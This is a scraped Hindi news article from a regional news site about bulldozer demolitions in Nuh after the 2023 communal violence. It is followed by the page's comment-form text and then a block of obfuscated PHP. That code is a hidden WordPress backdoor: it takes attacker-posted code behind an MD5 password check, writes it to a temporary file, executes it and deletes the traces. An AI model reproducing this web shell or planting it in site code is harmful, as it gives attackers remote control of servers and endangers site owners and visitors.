Nuh Violence : जहां से हुई पत्थरबाजी वह होटल ध्वस्त, तीन मंजिला इमारतों पर चला बुलडोजर, अभियान जारी

Uttarakhand Press 07 August 2023: रविवार को पुलिस की कड़ी सुरक्षा में दोनों तीनमंजिला इमारतों को बुलडोजर चलाकर ढहा दिया गया। उपद्रवियों के खिलाफ शासन का अभियान जारी है।

सांप्रदायिक हिंसा के दौरान जिस सहारा होटल और टाइल्स से दंगाइयों ने शोभायत्रा पर पथराव किया था उसे ध्वस्त कर दिया गया है। रविवार को पुलिस की कड़ी सुरक्षा में दोनों तीनमंजिला इमारतों को बुलडोजर चलाकर ढहा दिया गया।

दंगाइयों को अपनी इमारत इस्तेमाल करने देने वालों पर प्रशासन की सख्त कार्रवाई चौथे दिन भी जारी रही। रविवार को नूंह में एक होटल को जमींदोज कर दिया गया। प्रशासन के मुताबिक, जमीदोंज किए गए सहारा होटल की छत से उपद्रवियों ने हिंसा के दौरान जमकर पत्थरबाजी की थी, वहीं तावडू उपमंडल में दूसरे दिन भी राष्ट्रीय राजमार्ग 919 पर खोरी कला में तोड़फोड़ अभियान चलाया गया। राजस्थान की औद्योगिक नगरी भिवाड़ी के साथ सटे खोरी कला सीमा से अभियान की शुरुआत हुई।

यहां पर वन और पंचायत विभाग की भूमि पर भारी संख्या में रसायन युक्त ड्रमों ओर प्लास्टिक कबाड़ गोदाम हैं। जिन्हें प्रशासन द्वारा चलाए गए तोड़फोड़ अभियान में जेसीबी मशीन की मदद से ध्वस्त कर दिया गया। हालांकि ज्यादातर कबाड़ संचालकों ने अपने कीमती सामान को पहले ही सुरक्षित निकाल लिया, क्योंकि एक दिन पहले ही उन्होंने प्रशासन की स्थिति को भांप लिया था। जिला स्तर पर चलाए गए इस तोड़फोड़ अभियान को नूंह हिंसा में शामिल उपद्रवियों पर कार्रवाई भी माना जा रहा है। कार्रवाई से कुछ लोग संतुष्ट हैं तो अधिकतर लोगों में प्रशासन के प्रति भारी रोष है। उनका मानना है कि प्रशासन स्थानीय लोगों के रोजगार को ध्वस्त कर रहा है।

तावडू उपमंडल अधिकारी संजीव कुमार ने बताया कि सरकार के आदेश के मुताबिक, सरकारी भूमि पर जहां भी अवैध कब्जा है, उसकी एक सूची तैयार कर ली गई है। इसी क्रम में यह कार्रवाई की जा रही है। खोरी कला में लंबे अरसे से वन भूमि और पंचायती भूमि पर कब्जा धारियों ने अवैध ठिकाने जमाए हुए थे। इसके अलावा राष्ट्रीय राजमार्ग के आसपास भी लोगों ने भारी अतिक्रमण किया हुआ है, जिन पर कार्रवाई की गई है, जो नियमानुसार आगे भी जारी रहेगी।

Read Previous

बड़ी खबर: शिव मंदिर में पूजा करते समय भरभराकर गिरी छत, कई महिलाओं के दबने की सूचना, एक की मौत

Read Next

Raksha Bandhan 2023: इस साल 2 दिन मनाया जाएगा रक्षाबंधन, जानिए राखी बांधने की सही तिथि और शुभ मुहूर्त

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}